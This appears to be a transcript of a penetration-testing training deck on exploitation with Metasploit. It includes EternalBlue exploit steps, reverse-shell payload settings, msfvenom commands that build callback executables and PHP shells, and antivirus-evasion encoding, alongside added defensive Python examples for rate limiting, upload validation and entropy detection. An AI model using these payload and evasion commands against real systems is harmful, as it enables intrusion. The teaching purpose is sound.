
Practical White Hat Hacker Training - Exploitation

This presentation is part of Prisma CSI's Practical White Hat Hacker Training v1.

PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com

This document may be quoted or shared, but cannot be modified or used for commercial purposes. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.


  1. www.prismacsi.com © All Rights Reserved. Practical White Hat Hacker Training #5 Exploitation. This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
  2. Exploit Stage Topics
     • What is an exploit?
     • Types of exploits
     • Local, remote and 0day exploits
     • Exploit Databases
     • Example Exploit Scenarios
     • Exploit Execution and Usage Scenarios
     • Exploit Frameworks
     • Payload Concept
     • Metasploit Framework
     • Antivirus Evasion Software
     • Veil-Evasion
     • Shellter
     • Applications
  3. Basic Concepts
     • What’s an exploit?
     • The name given to tools developed to exploit a vulnerability.
     • Also called exploitation code.
     • Local Exploit
     • Remote Exploit
     • Web Exploit
     • DoS Exploit
     • 0day Exploit
     • What’s a Payload?
     • A piece of malicious code that performs a desired action once an exploit has succeeded.
  4. Exploit Databases
     • Large collections of public exploits. Exploits for the software and services discovered on a target can be searched for in these databases.
     • Exploit-db.com
     • Securityfocus.com
     • 0day.today
     • Exploits.shodan.io
     • Iedb.ir
     • Cxsecurity.com/exploit
     • Rapid7.com/db
  5. Exploit Development Languages
     • In which programming languages are exploits generally written?
     • Python
     • C / C++
     • Perl
     • PHP
     • Ruby
     • Why was the framework concept conceived?
     • Metasploit Framework example
  6. Exploit Execution / Use – Demo
  7. Exploit Editing
     • Exploits don’t execute on every system.
     • Parameters may vary with the operating system, processor architecture and system language.
     • In that case you may need to edit the exploit before executing it.
     • Replicas of the target system can be created in a laboratory environment for testing.
     • Assume you only have one chance to attack!
     • A system crash may be the end of everything.
  8. Exploit Example - Scenario
     • Consider a bank’s credit calculation area!
     • Where is the calculation performed? (Server? Client?)
     • What if we perform the request specified in the scenario thousands of times within a minute?
     • This is an example of a simple DoS exploit :)
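The server-side mitigation for this scenario is to rate-limit the calculation endpoint per client (and to perform the calculation on the server rather than trusting the client). The Python below is an added example, not code from the training: it implements a sliding-window limiter with an injected clock and replays a normal client and a flooding client against it. It assumes a single server process; a real deployment keeps the per-client counters in shared storage.

```python
"""Per-client sliding-window request limiter: the server-side mitigation
for the "thousands of calculation requests per minute" DoS scenario.
Added example, not code from the training."""
from __future__ import annotations

from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` requests per client in any `window` seconds.
    The clock is passed in by the caller so behaviour is deterministic."""

    def __init__(self, limit: int, window: float) -> None:
        self.limit = limit
        self.window = window
        # client id -> timestamps of its requests inside the current window
        self._hits: dict[str, deque[float]] = defaultdict(deque)

    def allow(self, client_id: str, now: float) -> bool:
        q = self._hits[client_id]
        while q and now - q[0] >= self.window:   # drop timestamps that aged out
            q.popleft()
        if len(q) >= self.limit:
            return False                          # over quota: answer 429 Too Many Requests
        q.append(now)
        return True


def simulate(limiter: SlidingWindowLimiter, client_id: str,
             requests_per_minute: int, seconds: float) -> tuple[int, int]:
    """Replay one client sending at a fixed rate; return (allowed, denied)."""
    total = int(requests_per_minute * seconds / 60)
    interval = 60.0 / requests_per_minute
    allowed = denied = 0
    for i in range(total):
        if limiter.allow(client_id, i * interval):
            allowed += 1
        else:
            denied += 1
    return allowed, denied


if __name__ == "__main__":
    # Constructed scenario: 60 calculations per minute is plenty for a human.
    limiter = SlidingWindowLimiter(limit=60, window=60.0)
    print("normal user  :", simulate(limiter, "10.0.1.50", requests_per_minute=30, seconds=60))
    print("flooding user:", simulate(limiter, "10.0.1.99", requests_per_minute=3000, seconds=60))
```

The limiter keys on a client identifier (source address, session or API key); the flooding client gets its first 60 requests through and every later one rejected until its oldest request ages out of the window, while other clients are unaffected.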
  9. Exploit Frameworks
     • Metasploit Community
     • Metasploit Pro
     • Core Impact
     • Exploithub
     • BeEF
  10. Metasploit Framework
     • Metasploit Framework
     • Installation
     • Basic commands
     • Auxiliary modules
     • Exploit use
     • Payload list and Meterpreter use
     • Output analysis
     • Post exploitation
  11. Metasploit Framework
     • It’s open source software.
     • A Pro version is available, but the Community version is sufficient for this course.
     • Exploits
     • Payloads
     • Auxiliary modules
     • Encoders
     • Post-exploitation modules
  12. Metasploit Framework
     • Visit the link below for installation instructions:
     • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
     • Update: msfupdate
  13. Metasploit Framework
  14. Metasploit Framework
     • Start
     • Begin by typing msfconsole on the command line.
     • You can check the database status with the following command: db_status
  15. Metasploit Framework
     • Workspace concept
     • workspace lists all available workspaces.
     • workspace -a prisma creates a workspace named prisma.
     • workspace prisma switches to the prisma workspace.
     • workspace -d prisma deletes the prisma workspace.
  16. Metasploit Framework
  17. Metasploit Framework
     • Working with Nessus and Nmap outputs: the output of scanning tools can be imported into Metasploit and used from there. This is one of the best features of the Metasploit Framework.
     • db_import nmap.xml imports nmap output.
     • db_import nessus-report.nessus imports a Nessus report.
     • db_export -f xml /tmp/prisma.xml exports the data in your workspace.
  18. Metasploit Framework
  19. Metasploit Framework
  20. Metasploit Framework
     • Workspace data:
     • hosts
     • services
     • creds
     • loot
  21. Metasploit Framework
     • Hosts command
     • db_nmap -sS -Pn -n 10.0.1.0/24 runs an nmap scan from inside msfconsole. The hosts command then lists every IP address discovered by the scan.
     • hosts -h shows all options of the hosts command.
     • hosts -R adds the listed addresses to the RHOSTS option of the current module.
  22. Metasploit Framework
  23. Metasploit Framework
     • Services command
     • db_nmap -sS -Pn -n -sV 10.0.1.0/24 runs an nmap scan with version detection. Afterwards the services command lists the ports on every host and the services running on them.
     • services -h shows all options of the services command.
     • services -p 445
     • services -S http
     • services -p 80 -R
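As an added example (not Metasploit's own importer), the Python below rebuilds the hosts and services tables that db_import fills from an nmap XML report, and reproduces the services -p, services -S and -R filters used on these slides. The XML report is a constructed sample; the host addresses and banners in it are made up.

```python
"""Rebuild the hosts/services tables that `db_import nmap.xml` fills, plus
the `services -p`, `services -S` and `-R` filters, from an nmap XML report.
Added example; this is not Metasploit's own importer."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample: a trimmed `nmap -oX` report (addresses are made up).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -Pn -n -sV -oX nmap.xml 10.0.1.0/24">
  <host><status state="up"/><address addr="10.0.1.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Windows 7 Professional microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="10.0.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.29"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/>
        <service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.1.99" addrtype="ipv4"/></host>
</nmaprun>
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    info: str


def db_import(xml_text: str) -> tuple[list[str], list[Service]]:
    """Return (hosts, services): what `hosts` and `services` would list."""
    root = ET.fromstring(xml_text)
    hosts: list[str] = []
    services: list[Service] = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip hosts nmap did not see up
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        hosts.append(ip)
        for port in host.findall("ports/port"):
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            # nmap splits product and version; the services table shows one info column
            info = (" ".join(v for v in (svc.get("product"), svc.get("version")) if v)
                    if svc is not None else "")
            services.append(Service(ip, int(port.get("portid")), port.get("protocol"),
                                    port.find("state").get("state"), name, info))
    return hosts, services


def services_filter(services: list[Service], port: int | None = None,
                    search: str | None = None, up_only: bool = True) -> list[Service]:
    """`services -p PORT` and `services -S TEXT`; only open ports by default."""
    out = []
    for s in services:
        if up_only and s.state != "open":
            continue
        if port is not None and s.port != port:
            continue
        if search is not None and search.lower() not in f"{s.name} {s.info}".lower():
            continue
        out.append(s)
    return out


def rhosts(services: list[Service]) -> str:
    """What `-R` does: the matching hosts, de-duplicated, as an RHOSTS value."""
    seen: list[str] = []
    for s in services:
        if s.host not in seen:
            seen.append(s.host)
    return " ".join(seen)


if __name__ == "__main__":
    hosts, services = db_import(SAMPLE_NMAP_XML)
    print("hosts:", hosts)
    for s in services_filter(services, port=445):
        print("services -p 445 ->", s.host, s.port, s.name, s.info)
    print("services -S http -R -> RHOSTS =", rhosts(services_filter(services, search="http")))
```

Note that the closed port 445 on 10.0.1.20 is kept in the table but dropped by the default filter, which is the difference that matters when -R is used to feed a host list into a module.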
  24. Metasploit Framework
  25. Metasploit Basic Command List
     • help
     • Help command
     • banner
     • Allows you to take awesome screenshots :)
     • info
     • Get information on any plugin
     • info exploit/windows/smb/psexec
     • search
     • Search command
     • search ms17-010
  26. Metasploit Basic Command List
     • use
     • Select an exploit
     • use exploit/windows/smb/psexec
     • set
     • Exploit
     • info
     • Acquire information on any plugin
     • info exploit/windows/smb/psexec
     • search
     • Search command
     • search ms17-010
  27. Metasploit Framework - Help
  28. Metasploit Framework - Banner
  29. Metasploit Framework - Info
  30. Metasploit Basic Command List
     • set
     • Used to assign a value to a parameter.
     • set RHOST 10.0.1.5
     • setg
     • Used to assign a parameter value globally.
     • unset
     • Used to clear parameter values.
     • show
     • Show names :)
     • use
     • Activates a plugin.
  31. Metasploit Basic Command List
     • run and exploit
     • Used to run a plugin.
     • load and unload
     • Used to activate or deactivate a module.
     • exit
     • Exit command
  32. Metasploit Show Command
     • show payloads
     • List payloads
     • show targets
     • List the operating systems a given plugin can attack
     • show options
     • Show the configurable parameters of a plugin
     • show encoders
     • List all encoders
  33. Auxiliary Modules and Use
     • show auxiliary
     • search smb_login
     • use auxiliary/dos/windows/rdp/ms12_020
     • set RHOST
     • set RPORT
     • run
  34. Exploit Attempt (MS17-010)
     • search netapi
     • info exploit/windows/smb/ms17_010_eternalblue
     • use exploit/windows/smb/ms17_010_eternalblue
     • show options
     • set payload windows/meterpreter/bind_tcp
     • set LHOST
     • set RHOST
     • set RPORT
     • exploit
  35. Payload Examples
     • set PAYLOAD windows/meterpreter/reverse_http
     • set PAYLOAD windows/shell/bind_tcp
     • set PAYLOAD linux/x86/meterpreter/reverse_https
     • set PAYLOAD php/meterpreter/bind_tcp
     • set PAYLOAD java/meterpreter/bind_tcp
     • set PAYLOAD windows/vncinject/reverse_tcp
  36. Reverse/Bind Shell
  37. Session Management
     • exploit/multi/handler
     • Can be used as a listener.
     • The listener can be run as a job to receive connections from multiple targets.
     • jobs:
     • exploit -j
     • The jobs command lists running jobs.
  38. Session Management
     • You can manage all obtained sessions with the sessions command.
     • sessions -l : list sessions
     • sessions -i 1 : interact with session 1
     • sessions -K : end all sessions
     • sessions -u : upgrade a shell session to a Meterpreter session
     • kill : used to kill a session.
     • background : sends the session to the background and returns to the Metasploit console.
  39. Exploit Search
     • Searchsploit
  40. What’s Msfvenom?
     • There may be no directly exploitable vulnerability in the target system.
     • In that case it may be necessary to try to penetrate the system in other ways.
     • For example, if a crafted malicious .exe file is somehow uploaded to and executed on a system, the system can be taken over.
     • Or you might upload a malicious shell written in PHP to a web application through a file upload vulnerability and obtain a terminal connection in Metasploit.
     • That’s where msfvenom comes into play!
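From the defender's side, the PHP-shell-through-file-upload path on this slide is closed by validating uploads on the server. The Python below is an added example (not code from the training or from any web framework): it checks the whole extension chain, compares the content against the magic bytes of the claimed type, and scans the content for PHP code indicators such as the fsockopen call a PHP stager relies on. All sample files are constructed; 192.0.2.1 is a documentation address.

```python
"""Server-side checks for a file-upload endpoint: extension allowlist,
magic-byte check and PHP indicator scan. Added example, not code from the
training or from any framework."""
from __future__ import annotations

import re

# Magic bytes of the file types the endpoint is allowed to accept.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions a typical web server would hand to the PHP interpreter.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
# Tokens typical of PHP stagers/droppers hiding inside a file that claims to be an image.
PHP_INDICATORS = re.compile(
    rb"<\?php|<\?=|\b(?:eval|assert|fsockopen|base64_decode|system|shell_exec|passthru)\s*\(",
    re.IGNORECASE,
)


def check_upload(filename: str, content: bytes) -> list[str]:
    """Return the reasons to reject the upload; an empty list means accept."""
    problems: list[str] = []
    name = filename.lower()
    if ".." in name or "/" in name or "\\" in name or "\x00" in name:
        problems.append("unsafe characters in filename")
    exts = name.split(".")[1:]          # "avatar.php.png" -> ["php", "png"]
    last = exts[-1] if exts else ""
    if last not in ALLOWED_TYPES:
        problems.append(f"extension {last or '(none)'!r} not in allowlist")
    if SERVER_EXECUTABLE & set(exts):   # catches double extensions too
        problems.append("server-executable extension present")
    if last in ALLOWED_TYPES and not content.startswith(ALLOWED_TYPES[last]):
        problems.append(f"content does not start with .{last} magic bytes")
    if PHP_INDICATORS.search(content):
        problems.append("PHP code indicators in content")
    return problems


# Constructed samples (no real payloads; 192.0.2.1 is a documentation address).
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + bytes(32)
PHP_FILE = b"<?php echo 'constructed sample'; fsockopen('192.0.2.1', 4444); ?>"
POLYGLOT = b"\x89PNG\r\n\x1a\n" + b"<?php echo 'constructed sample'; ?>"

if __name__ == "__main__":
    for fname, data in [("photo.png", GOOD_PNG), ("exp.php", PHP_FILE),
                        ("shell.png", PHP_FILE), ("avatar.php.png", POLYGLOT)]:
        verdict = check_upload(fname, data)
        print(f"{fname:16} -> {'ACCEPT' if not verdict else 'REJECT: ' + '; '.join(verdict)}")
```

Even an accepted file should be stored under a server-generated name outside the web root and served with a fixed Content-Type, so that a future bypass of these checks still does not give the uploader code execution.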
  41. Msfvenom Use
     • Msfvenom basic commands
     • msfvenom -h
     • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -f exe > shell.exe
     • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f raw > exp.php
     • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
  42. Msfvenom AV Evasion – Demonstration
     • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
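Encoding with shikata_ga_nai defeats signature matching on the payload bytes, but it does not make them look like normal code: an encoded blob is close to random, and iterating the encoder 15 times does not change that. Byte entropy is therefore one of the heuristics antivirus and sandbox tooling applies on the defensive side. The Python below is an added example, not msfvenom or any AV engine's code: it measures entropy per window and flags regions that look like noise. The buffers it scans are constructed (a seeded PRNG stands in for the encoded blob; no shellcode is involved).

```python
"""Byte-entropy heuristic for spotting encoded or packed payloads.
Added example; not code from msfvenom or from any antivirus engine."""
from __future__ import annotations

import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, up to 8.0 for uniform noise."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data: bytes, window: int = 1024,
                         threshold: float = 7.0) -> list[tuple[int, float]]:
    """Slide a fixed window over the buffer and report (offset, entropy)
    for every window whose entropy reaches the threshold."""
    hits = []
    for off in range(0, len(data) - window + 1, window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def looks_encoded(data: bytes, window: int = 1024, threshold: float = 7.0) -> bool:
    """True if any window is noise-like. Encoders do not lower entropy, however
    many iterations are applied; only the short decoder stub stays structured."""
    return bool(high_entropy_regions(data, window, threshold))


# Constructed samples. A seeded PRNG stands in for an encoded payload so the
# run is reproducible; it is not shellcode.
_rng = random.Random(1337)
PLAIN_TEXT = (b"GET /credit/calculate?amount=1000 HTTP/1.1\r\nHost: bank.example\r\n\r\n" * 20)[:1024]
DECODER_STUB = (b"decoder-stub " * 80)[:1024]            # low-entropy structured prefix
ENCODED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
FAKE_BINARY = DECODER_STUB + ENCODED_BLOB                # stub followed by the noise-like blob

if __name__ == "__main__":
    print(f"plain text entropy : {shannon_entropy(PLAIN_TEXT):.2f}")
    print(f"encoded blob entropy: {shannon_entropy(ENCODED_BLOB):.2f}")
    print("suspicious regions in fake binary:", high_entropy_regions(FAKE_BINARY))
```

The window size matters: with 1024-byte windows the regions reported start exactly where the structured stub ends, which is the same picture a per-section entropy check gives on a real PE file. Legitimate compressed or encrypted data also scores high, so this is a triage signal to combine with other indicators, not a verdict on its own.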
  43. Msfvenom Help
  44. Msfvenom PHP Payload Contents
  45. Download Additional Metasploit Plugins
     • https://github.com/darkoperator/Metasploit-Plugins
  46. Loading Metasploit Features
     • Plugin files are added manually under ~/.msf4/plugins/
  47. Armitage Use
     • Metasploit Framework GUI
     • Used to perform actions quickly
     • The interface is somewhat easier to use than the console application
  48. Armitage Use
     • Adding a host
  49. Armitage Use
     • Host scanning
  50. Armitage Use
     • Scan results
  51. Armitage Use
     • Finding an attack vector
  52. Armitage Use
     • Java_rmi_attack
  53. Armitage Use
     • Java_rmi_attack
     • Meterpreter session
  54. Antivirus Evasion Tools
     • An antivirus mechanism may be present on target systems.
     • In that case the attack must be performed with much more caution.
     • There are tools developed to bypass antivirus products.
     • Tools used
     • Veil-Evasion
     • Shellter
     • Av0id
     • Msfvenom
  55. Veil-Evasion Installation
  56. Veil-Evasion Payload Selection
  57. Veil-Evasion Payload Configuration
  58. Veil-Evasion Payload Creation - DEMO
  59. Virustotal Scanning
  60. Shellter Installation
  61. Shellter Use – DEMO
  62. Virustotal Scanning
  63. Applications
  64. Questions?
  65. Contacts: www.prismacsi.com, info@prismacsi.com, 0 850 303 85 35, /prismacsi